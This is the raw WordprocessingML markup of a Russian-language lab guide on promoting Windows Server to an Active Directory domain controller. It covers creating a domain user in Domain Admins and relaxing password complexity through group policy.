      </w:r>
    </w:p>
    <w:p w14:paraId="1056368B" w14:textId="40FAB989" w:rsidR="00ED3ECF" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t xml:space="preserve">Выбираем «DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>» и нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC8B84" w14:textId="3E2A1D57" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="114F3966" wp14:editId="756F1A20">
            <wp:extent cx="3960000" cy="3750192"/>
            <wp:effectExtent l="0" t="0" r="254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75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D48C" w14:textId="77777777" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>На данном этапе «Мастер настройки AD DS» предупредит, что делегирование для этого DNS-сервера не может быть создано.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ABA5C4" w14:textId="37B52A46" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Yes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C238770" w14:textId="6296273C" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C15475E" wp14:editId="3CCF4B07">
            <wp:extent cx="3600000" cy="1994358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9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FE75" w14:textId="77777777" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>Теперь можно изменить пути к каталогам базы данных AD DS, файлам журнала и папке SYSVOL. Рекомендую оставить эти значения по умолчанию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E37B03" w14:textId="5DAB98A4" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6AEDCD" w14:textId="48B240BF" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03585758" wp14:editId="160297D5">
            <wp:extent cx="3960000" cy="3750192"/>
            <wp:effectExtent l="0" t="0" r="254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75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B964" w14:textId="70E6A8AE" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00D04619">
        <w:t>Указываем пароль для DSRM (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>Directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D04619">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>Service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D04619">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>Restore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D04619">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>Mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D04619">
        <w:t xml:space="preserve"> — режим восстановления службы каталога) и нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE21BB6" w14:textId="290539B9" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D04619">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48843C5B" wp14:editId="38DEB953">
            <wp:extent cx="3960000" cy="3746587"/>
            <wp:effectExtent l="0" t="0" r="254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4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0DD0" w14:textId="77777777" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>На следующем шаге отображается сводная информация по настройке сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D962B82" w14:textId="030421CB" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679043ED" w14:textId="0F7F991F" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00D04619">
        <w:t>Начался процесс повышения роли сервера до уровня контроллера домена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D21E319" w14:textId="110CA8F4" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D04619">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DBA6183" wp14:editId="56542362">
            <wp:extent cx="3960000" cy="2767449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76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D77B" w14:textId="77777777" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>Процесс повышения роли сервера до уровня контроллера домена завершен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1018612C" w14:textId="10D7F8C0" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Finish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486E99EB" w14:textId="7598436B" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r w:rsidRPr="00D04619">
        <w:t xml:space="preserve">Теперь система предложит перезагрузить сервер для </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>того</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D04619">
        <w:t xml:space="preserve"> чтобы новые настройки вступили в силу.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D04619">
        <w:t>Нажимаем на кнопку «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>Restart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D04619">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>Now</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D04619">
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACA7D63" w14:textId="77777777" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t>Повышение роли сервера до уровня контроллера домена завершено.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F6730" w14:textId="2DE6F55C" w:rsidR="00D04619" w:rsidRDefault="00D04619" w:rsidP="00D04619">
      <w:r>
        <w:t xml:space="preserve">Для управления пользователями, группами и другими объектами каталога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можно использовать привычную многим оснастку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Computers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105F914F" w14:textId="36AD0898" w:rsidR="002C5BCA" w:rsidRPr="00984E27" w:rsidRDefault="002C5BCA" w:rsidP="00D04619">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C5BCA">
        <w:t>Переходим</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:t>меню</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Start» </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:t>выбираем</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:t>пункт</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Administrative Tools», </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:t>далее</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:t>выбираем</w:t>
      </w:r>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Active Directory Users and Computers».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F74C1" w14:textId="5D8C9E2D" w:rsidR="002C5BCA" w:rsidRPr="002C5BCA" w:rsidRDefault="002C5BCA" w:rsidP="002C5BCA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C5BCA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="769CFB09" wp14:editId="24D2E941">
            <wp:extent cx="5398787" cy="4663989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7800"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400000" cy="466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18F9" w14:textId="4075A921" w:rsidR="008E3B47" w:rsidRDefault="007C5553" w:rsidP="009A06FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Откроется</w:t>
      </w:r>
      <w:r w:rsidR="008E3B47" w:rsidRPr="008E3B47">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>оснастка</w:t>
      </w:r>
      <w:r w:rsidR="008E3B47" w:rsidRPr="008E3B47">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Active Directory Users and Computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46530BDD" w14:textId="70D5C75A" w:rsidR="008E3B47" w:rsidRPr="008E3B47" w:rsidRDefault="008E3B47" w:rsidP="008E3B47">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E3B47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="544DAA73" wp14:editId="647864BD">
            <wp:extent cx="5400000" cy="3771798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3D65" w14:textId="6A5FA8E1" w:rsidR="00011D92" w:rsidRDefault="00011D92" w:rsidP="00A96A86">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0468A7" w14:textId="0B25916A" w:rsidR="00011D92" w:rsidRDefault="00011D92" w:rsidP="00A96A86">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E943948" w14:textId="687F0C36" w:rsidR="00C7502C" w:rsidRPr="00DB30B6" w:rsidRDefault="00C7502C" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00C7502C">
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Добавить пользователя в домене. Назначить ему группу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:r w:rsidRPr="0092037C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Admins</w:t>
      </w:r>
      <w:r w:rsidR="00DB30B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290DF19" w14:textId="3F1B85BF" w:rsidR="00A96A86" w:rsidRDefault="00A96A86" w:rsidP="00A96A86">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21B06CD2" wp14:editId="084B7674">
            <wp:extent cx="5400000" cy="3768623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6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EC8F" w14:textId="66BF43CC" w:rsidR="00A96A86" w:rsidRDefault="00A96A86" w:rsidP="00A96A86">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1069A3CD" wp14:editId="2D05213D">
            <wp:extent cx="2880000" cy="242077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42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86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="3"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C8360DC" wp14:editId="7C6C6DDA">
            <wp:extent cx="2880000" cy="242285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42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9E6CEC">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="3"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC1BB06" w14:textId="5CA297D5" w:rsidR="007C5553" w:rsidRDefault="007C5553" w:rsidP="00495DE1">
      <w:r>
        <w:t>___________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146DB42B" w14:textId="17387A8A" w:rsidR="007C5553" w:rsidRDefault="007C5553" w:rsidP="00495DE1">
      <w:r>
        <w:t>Примечание:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40223956" w14:textId="24315A9B" w:rsidR="00495DE1" w:rsidRDefault="00495DE1" w:rsidP="00495DE1">
      <w:r>
        <w:t>Пароль должен соответствовать стандартным требованиям политик безопасности, поэтому если Вы испытываете сложности в его формировании, перейдите в политики и измените соответствующие настройки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46917665" w14:textId="031B7BA5" w:rsidR="00495DE1" w:rsidRDefault="00495DE1" w:rsidP="00495DE1">
      <w:r>
        <w:t xml:space="preserve">Обратите внимание, что в данном случае изменить сложность пароля в локальных политиках невозможно. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437A2675" w14:textId="77777777" w:rsidR="00495DE1" w:rsidRDefault="00495DE1" w:rsidP="0027303B"/>
    <w:p w14:paraId="5E10FE1C" w14:textId="65057228" w:rsidR="00495DE1" w:rsidRDefault="00495DE1" w:rsidP="00495DE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5A7CFA" wp14:editId="2F40CE49">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2207260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1074259</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="655092" cy="116356"/>
                <wp:effectExtent l="0" t="0" r="12065" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="58" name="Овал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1163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oval w14:anchorId="68E7B6F9" id="Овал 58" o:spid="_x0000_s1026" style="position:absolute;margin-left:173.8pt;margin-top:84.6pt;width:51.6pt;height:9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A85EF09" wp14:editId="1DD7F7AE">
            <wp:extent cx="2880000" cy="219476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295" r="14386"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="219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6C81B89" wp14:editId="1DB8AF18">
            <wp:extent cx="2880000" cy="215724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5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650E" w14:textId="4B51C984" w:rsidR="00495DE1" w:rsidRDefault="00495DE1" w:rsidP="0027303B">
      <w:r>
        <w:t>Данный факт объясняется тем, что локальная политика компьютера теперь задаётся групповой политикой домена, соответственно необходимо внести изменения в групповых политиках сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082B7EF8" w14:textId="31A00D32" w:rsidR="00495DE1" w:rsidRDefault="006F5D7A" w:rsidP="0027303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E3EA3F" wp14:editId="4A292938">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5193191</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>927100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="361154" cy="95810"/>
                <wp:effectExtent l="0" t="0" r="20320" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="63" name="Овал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54" cy="95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oval w14:anchorId="00509FFD" id="Овал 63" o:spid="_x0000_s1026" style="position:absolute;margin-left:408.9pt;margin-top:73pt;width:28.45pt;height:7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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00495DE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1EE878" wp14:editId="3DB33073">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2050406</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>907955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="811634" cy="123029"/>
                <wp:effectExtent l="0" t="0" r="26670" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="61" name="Овал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634" cy="1230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oval w14:anchorId="456D72E6" id="Овал 61" o:spid="_x0000_s1026" style="position:absolute;margin-left:161.45pt;margin-top:71.5pt;width:63.9pt;height:9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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00495DE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22E115EF" wp14:editId="30133D21">
            <wp:extent cx="2880000" cy="219476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295" r="14386"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2880000" cy="219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495DE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BAF820A" wp14:editId="652DF151">
            <wp:extent cx="2880000" cy="216007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5186" w14:textId="6386F8CF" w:rsidR="006F5D7A" w:rsidRDefault="006F5D7A" w:rsidP="006F5D7A">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Пройдя по древу конфигураций Вы можете отключить требование сложности к паролю.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0425A914" w14:textId="793342EF" w:rsidR="006F5D7A" w:rsidRDefault="006F5D7A" w:rsidP="006F5D7A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F68B96" wp14:editId="52FFF5DD">
            <wp:extent cx="2880000" cy="2165433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F872" w14:textId="444AB453" w:rsidR="00D65DE9" w:rsidRPr="00D65DE9" w:rsidRDefault="00D65DE9" w:rsidP="0027303B">
      <w:r>
        <w:t xml:space="preserve">Для того, чтобы изменённые Вами параметры вступили в силу необходимо обновить групповые политики на данном контроллере домена выполнив команду в </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">консоли </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> иначе нам придётся перезагружать сервер, что в реальных условиях не всегда возможно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273BEAD7" w14:textId="0556ED6F" w:rsidR="00D65DE9" w:rsidRDefault="00D65DE9" w:rsidP="00D65DE9">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5690EDC0" wp14:editId="1419FCAF">
            <wp:extent cx="5400000" cy="129729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F32B" w14:textId="24992F55" w:rsidR="00017D46" w:rsidRDefault="00017D46" w:rsidP="00017D46">
      <w:r>
        <w:t>Конец примечания.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51BB2C" w14:textId="208671C2" w:rsidR="00017D46" w:rsidRDefault="00017D46" w:rsidP="00017D46">
      <w:r>
        <w:t>___________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7408F7E2" w14:textId="3E9BBB4B" w:rsidR="00A96A86" w:rsidRPr="00A96A86" w:rsidRDefault="00A96A86" w:rsidP="0027303B">
      <w:r>
        <w:t>В свойствах пользователя д</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:t>обавим пользователя в группы</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505C53A" w14:textId="29F046EE" w:rsidR="00A96A86" w:rsidRDefault="00A96A86" w:rsidP="0027303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>через</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>меню</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ПКМ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All tasks - Add</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C62A2E5" w14:textId="58CF5B93" w:rsidR="00A96A86" w:rsidRPr="00A96A86" w:rsidRDefault="00A96A86" w:rsidP="0027303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>либо</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5311FE10" w14:textId="34E0C677" w:rsidR="00A96A86" w:rsidRPr="00A96A86" w:rsidRDefault="00A96A86" w:rsidP="0027303B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>через</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>меню</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ПКМ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties – member of</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96A86">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04AA88" w14:textId="5A56F0E1" w:rsidR="00A96A86" w:rsidRDefault="00A96A86" w:rsidP="0027303B">
      <w:r>
        <w:rPr>
